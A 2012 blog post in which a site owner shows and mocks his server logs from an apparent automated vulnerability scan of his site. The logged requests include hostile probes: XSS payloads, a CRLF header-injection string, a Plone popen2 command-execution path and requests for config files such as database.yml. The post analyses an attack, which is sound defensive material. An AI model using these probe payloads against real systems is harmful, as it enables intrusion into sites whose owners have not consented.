O hai. I was justing doing a penetration test of your site.

Monday, 05 November, Year 4 d.Tr. | Author: Mircea Popescu

There's a guy, let's call him Raoul Duke, because that's what he calls himself, at least when he doesn't misspell his own name. And he was doing a little penetration testing, live. Part of it is discussed in the link, but maybe you've ever been curious to see how such a thing looks ?

Well you're in luck, I'ma spill the beans. First off, you need a smokescreen query, in this case something like this :

188.40.53.209 - - [05/Nov/2012:11:47:56 -0500] "GET /trilema/2012/the-storm-that-was-fel/?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?
[30kb deleted]
printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes?printable=yes HTTP/1.0" 301 - "http://trilema.com/2012/the-storm-that-was-fel" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

Have some dumb box do that as a sort of cover for your probing. It won't necessarily help anything but who knows, maybe ? These loud/quiet attack combos are all the rage these days, so why not. Curious how it looks ? Like thisi :

188.40.53.209 - [11:44:26] "GET /T/?printable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:26] "GET /T/?xprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:27] "GET /T/?xxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:27] "GET /T/?xxxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:27] "GET /T/?xxxxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:28] "GET /T/?xxxxxprintable=yes HTTP/1.0" 301
217.69.133.68 - [11:44:27] "GET /fain/hobby/libertate-dependent-de-fotografie/ HTTP/1.0" 200 19960 "-" "Mozilla/5.0 (compatible; Mail.RU_Bot/2.0)"
188.40.53.209 - [11:44:28] "GET /T/?xxxxxxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:29] "GET /T/?xxxxxxxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:29] "GET /T/?xxxxxxxxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:29] "GET /T/?xxxxxxxxxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:30] "GET /T/?xxxxxxxxxxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:30] "GET /T/?xxxxxxxxxxxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:30] "GET /T/?xxxxxxxxxxxxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:31] "GET /T/?xxxxxxxxxxxxxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:31] "GET /T/?xxxxxxxxxxxxxxprintable=yes HTTP/1.0" 301
217.69.133.68 - [11:44:31] "GET /fain/noutati/ecce-homo-andrei-pavel/ HTTP/1.0" 200 17682 "-" "Mozilla/5.0 (compatible; Mail.RU_Bot/2.0)"
188.40.53.209 - [11:44:32] "GET /T/?xxxxxxxxxxxxxxxprintable=yes HTTP/1.0" 301
188.40.53.209 - [11:44:32] "GET /T/?xxxxxxxxxxxxxxxxprintable=yes HTTP/1.0" 301

That mailbot.ru thing is probably unrelated, a little nefarious bit of software doing it's own thing, accidentally caught in the lights much like a worm that was doing its thing under a rock you happened to lift. The 188.40.53.209 ip actually comes up with a "Application error Rails application failed to start properly", proving yet again that RoR is shit. And then the logs show a second thread going off the same ip, onex twox threex bunch! and then a third (at the most I'm getting hit with about half a dozen requests a second, so nothing huge by any means). But let's get to the meat :

This IP that tried to get just about every fain tag there is up to this point, and plenty that aren't (to the tune of a few k requests) suddenly goes into human-mode :

192.162.103.53 - [11:46:31] "GET /bitcoin/db_dump.php HTTP/1.1" 200 66485 "-" "Mozilla/5.0 (Windows NT 5.2; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0"

This is nice, the mpex db dump as explained in the FAQ. Someone's been reading, which is always commendable.

192.162.103.53 - [11:47:37] "GET /acunetix-wvs-test-for-some-inexistent-file HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"

This is nicely treated in Script Kiddie Tactics (or the Lack Thereof), 4 four year old (almost to the day) McGrew Security article.

192.162.103.53 - [11:47:46] "GET /IOAwEEhH HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:46] "GET /DyeFdC55 HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:46] "GET /NB0l5SOR HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"

I have absolutely no idea what those are.

192.162.103.53 - [11:47:55] "GET /WebResource.axd?d=0Pi6rSfP HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
92.162.103.53 - [11:47:55] "GET /Account/Register.aspx?ReturnUrl= HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:55] "POST /console/j_security_check HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"

These would be... hm. The third looks like a java exploit maybe ? The second I don't know. The third is a 5 year old hole in asp.net iirc.

192.162.103.53 - [11:47:56] "GET /solr/select/?q=test HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"

Looking for a solr, which is some sort of search server.

192.162.103.53 - [11:47:56] "GET /inexistent_file_name.inexistent0123450987.cfm HTTP/1.1" 302 212 "-" "<script>alert(12345)</script>"
192.162.103.53 - [11:47:56] "GET /clientaccesspolicy.xml HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:55] "GET /server-info HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"

That first one might seem stupid, but it is not [cached]. The second may work in a badly maintained Windows environment. The last is a simple request to mod_info, part of Apache.

192.162.103.53 - [11:47:56] "GET /fantastico_fileslist.txt HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:56] "GET /crossdomain.xml HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:56] "GET /elmah.axd HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:56] "GET http://trilema.com/:80/clientaccesspolicy.xml HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:56] "GET / HTTP/1.1" 200 902 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:56] "GET /server-status HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"

More Fantastico/Windows stuff.

192.162.103.53 - [11:47:56] "GET /servlet/%0ARefresh:0;URL=javascript:prompt(1)%0A1 HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"

%0A is a line break, and the entire thing is a recent-ish (September) vulnerability in IBM Lotus and possibly others, but otherwise %0A escaping has been causing trouble since at least 100 years ago.

192.162.103.53 - [11:47:56] "GET /web-console/Invoker HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"

JavaBeans.

192.162.103.53 - [11:47:56] "GET /long_inexistent_path12345_/Null.htw?CiWebhitsfile=:&CiRestriction=b&CiHiliteType=full HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:56] "GET /_layouts/scriptresx.ashx?culture=en-us&name=SP.JSGrid.Res&rev=laygpE0lqaosnkB4iqx6mA%3D%3D&sections=All<script>alert(12345)</script>z HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"

More MS IIS crap, more asp.net crap.

192.162.103.53 - [11:47:57] "GET /p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=dir HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:57] "GET @testasp.vulnweb.com/rpb.png HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:57] "GET //database.yml HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"

Apparently Plone was vulnerable last year. Also, more Ruby stuff. And also something kinda cute : that testasp.vulnweb giveaway mostly links to idiot hackers.

As you may guess I'm getting bored, but here's cherry for the cake :

192.162.103.53 - [11:47:57] "GET /robots.txt HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:57] "GET /?q=consultancy HTTP/1.1" 200 1115 "http://trilema.com//" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:57] "GET //database.yml_original HTTP/1.1" 302 212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:57] "GET /?q=company HTTP/1.1" 200 1210 "http://trilema.com//" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
192.162.103.53 - [11:47:57] "GET :@testasp.vulnweb.com/rpb.png HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"

In closing : I understand the life of a pentester may be the modern day equivalent of the cowboy, the desperado, the Lone Ranger, that intractable citadel of solitary masculinity many in their formative years pine for. There is absolutely nothing wrong with this.

However... it's a hard life, much like it was for the cowboy, the desperado, the lone ranger. It takes a lot of hard work, a lot of training and it never works out for a majority of aspirants. Ask rg in #trilema on freenode, he can tell you all about how it doesn't work for most aspirants.

Cheers. Or should I say greetz.

———
  1. Lines edited to replace redundant bits. []
Category: Meta psihoza
Comments feed : RSS 2.0. Leave your own comment below, or send a trackback.

8 Responses

  1. webresource.axd - asp.net stuff

  2. Hello there! This is kind of off topic but I need some guidance from an established blog. Is it hard to set up your own blog? I'm not very techincal but I can figure things out pretty quick. I'm thinking about setting up my own but I'm not sure where to start. Do you have any points or suggestions? Thank you

  3. Mircea Popescu`s avatar
    3
    Mircea Popescu 
    Thursday, 16 May 2013

    Gee, that's a difficult question. At the moment I'm looking for a place that'd repair my Iphone which I never had in Malaysia where I've never been. Once I find that I'll get right back to you.

  4. For one reason or another, I can't see all of this text, it keeps hiding? Are you utilising DHTML?

  5. Mircea Popescu`s avatar
    5
    Mircea Popescu 
    Saturday, 4 April 2015

    What do you mean "hiding" ?

  6. Geraldine`s avatar
    6
    Geraldine 
    Monday, 20 March 2017

    Thank you for the auspicious writeup. It in fact was a amusement account it.
    Look advanced to more added agreeable from you!
    However, how could we communicate?

  7. Mircea Popescu`s avatar
    7
    Mircea Popescu 
    Tuesday, 21 March 2017

    I dunno, drop by on irc I guess.

  1. [...] was on the 4th. Sorta lulzy in a let’s reminesce “O hai. I was justing doing a penetration test of your site.” way. Kids today, right [...]

Add your cents! »
    If this is your first comment, it will wait to be approved. This usually takes a few hours. Subsequent comments are not delayed.